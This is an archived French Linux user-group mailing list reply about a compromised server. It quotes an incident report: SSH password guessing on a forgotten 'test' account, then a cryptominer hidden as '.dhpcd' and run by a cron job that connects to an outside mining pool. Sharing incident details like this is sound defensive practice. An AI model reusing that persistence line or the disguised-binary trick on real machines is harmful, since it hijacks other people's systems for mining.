linux-31 - Re: [Linux-31] linux malware

Objet : Discussions sur le logiciel libre

Archives de la liste

Re: [Linux-31] linux malware

From: g hillartin <hillartin AT gmail.com>
To: linux-31 AT culte.org
Subject: Re: [Linux-31] linux malware
Date: Wed, 3 Mar 2021 08:09:45 +0100
Authentication-results: pic2s.le-pic.org; dkim=pass (2048-bit key; unprotected) header.d=gmail.com header.i= AT gmail.com header.b="tBnTUige"; dkim-atps=neutral

Le mer. 3 mars 2021 à 07:41, jdanield <linux-31 AT culte.org> a écrit :

Le 02/03/2021 à 23:05, Pascal Hambourg (via linux-31 Mailing List) a écrit :

> En quoi est-ce contradictoire avec ce que j'ai écrit ? Au contraire,
> c'est donc plus logique que le fichier soit dans ~test (répertoire
> personnel de l'utilisateur "test") plutôt que dans ~/test
> (sous-répertoire "test" dans le répertoire personnel de l'utilisateur
> courant).
>

tu as raison...

le détail du problème:

They guessed the password for user "test" and logged in via ssh, after
multiple attempts (dictionary attack, probably). The user "test" was
configured in the system long ago, and forgotten.

They copied executable malware to "/home/test/.dhpcd" and added a cronjob:

2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B \
>/dev/null 2>/dev/null

jdd
--

Y'a pas écrit .dhPCd là ?

[Linux-31] linux malware, jdd AT dodin.org, 02/03/2021
- Re: [Linux-31] linux malware, Albert ARIBAUD, 02/03/2021
  - Re: [Linux-31] linux malware, Albert ARIBAUD, 03/03/2021
- Re: [Linux-31] linux malware, Pascal Hambourg, 02/03/2021
  - Re: [Linux-31] linux malware, jdanield, 02/03/2021
    - Re: [Linux-31] linux malware, Pascal Hambourg, 02/03/2021
      - Re: [Linux-31] linux malware, jdanield, 03/03/2021
        
        Re: [Linux-31] linux malware, g hillartin, 03/03/2021
        
        Re: [Linux-31] linux malware, jdanield, 03/03/2021

Archives gérées par MHonArc 2.6.19+.

Archives de la liste

Re: [Linux-31] linux malware